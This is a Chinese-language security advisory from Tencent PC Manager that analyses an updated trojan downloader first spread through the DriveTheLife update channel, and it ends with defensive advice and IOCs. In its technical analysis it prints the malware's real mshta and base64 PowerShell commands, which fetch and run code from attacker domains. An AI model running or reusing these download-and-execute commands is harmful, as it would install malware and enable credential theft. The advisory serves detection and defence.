曾利用驱动人生升级通道传播的木马下载器再次升级

2019-01-28 来源:原创 作者:腾讯电脑管家
【文章摘要】御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器再次升级,本次升级的主要变化在于攻击模块。

一、概述

御见威胁情报中心125日再次监测到曾利用驱动人生升级通道传播的木马下载器再次升级。

本次升级的主要变化在于攻击模块,木马在之前的版本上,新增计划任务“DnsScan”,在其中将永恒之蓝攻击模块C:\Windows\Temp\svchost.exe设置为木马执行当天7:05开始,之后每个一小时执行一次。


该木马团伙持续活跃,最严重的一次破坏是入侵驱动人生公司,篡改商业软件的升级配置,利用正规软件的升级通道传播病毒。在相关公司堵塞这个木马传播渠道之后,该团伙利用其他传播渠道持续改进这个木马下载器。

该团伙的历次活动,均被腾讯御见威胁情报中心捕获:

时间

木马下载器主要行为变化

20181214

利用驱动人生系列软件升级通道下发,利用永恒之蓝漏洞攻击传播。

20181219

下发之后的木马新增Powershell后门安装。

2019109

检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。

2019124

木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。

2019125

木马在124日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和mshta脚本计划任务。

以下是详细技术分析:

二、技术分析

更新后的攻击模块svchost.exe除了利用永恒之蓝漏洞对内网以及外网机器进行扫描攻击外,还新增了以下功能:

1、利用powershell版黑客工具mimikatz抓取用户机器登录密码。

创建m.ps1并将混淆后的mimikatz工具代码写入。


将利用工具抓取到的用户登录密码保存到mkatz.ini


2、攻击模块尝试通过内置的弱密码字典尝试SMB爆破远程登录。


3、创建计划任务执行远程hta代码

mshta hxxp://w.beahh.com/page.html?p%COMPUTERNAME%


4、创建计划任务执行远程powershell代码

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

powershell命令解密后内容为:

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

三、安全建议

1.服务器暂时关闭不必要的端口(如135139445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

3.使用杀毒软件拦截可能的病毒攻击;

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统


IOCs

Domain

v.beahh.com

w.beahh.com

Md5

cce36235a525858eb55070847296c4c8

34410a21398137d71258e2658ecddaeb

4cb4ccfd1086fc78d2a1a063862bff41

65d17d790098fdff32c96bce0be6645e

7f8dde92700f5013b4ed23c6ec5b7337

8bf4cfe6d0938cd8a618e3a4cd32c79d

a56a29ddff74c1b536fa5c97863f0d35

ae4b536a5b7c6d6decc7e96591ce67f8

b73dfc81a367f4dfa44bb209ed9e5e67

c85cb83a850b4ccd2d2232a4d356d607

f6cd992c002be66c01ea2e16e3cd4df2

f75f0261296a8b7b81f54a076c58439c

fd38cca1e2fa4a7d14a2943b3ad5d20c

URL

hxxp://v.beahh.com/v

hxxp://w.beahh.com/page.html

参考链接:

永恒之蓝漏洞扩散传播的挖矿木马预警

https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ


“驱动人生”升级通道传木马完整技术分析报告

https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw


针对驱动人生公司的定向攻击活动分析报告

https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA


利用驱动人生升级通道传播的木马下载器出现新变化

https://media.weibo.cn/article?id=2309404319028930855515


驱动人生永恒之蓝下载器木马的最新变化(1月25日更新)


https://guanjia.qq.com/news/n3/2473.html


如何关闭不必要的端口(如135139445

https://guanjia.qq.com/web_clinic/s8/585.html

电脑管家V13.3

权限雷达全新升级

详情>>

版本更新:2019.5.6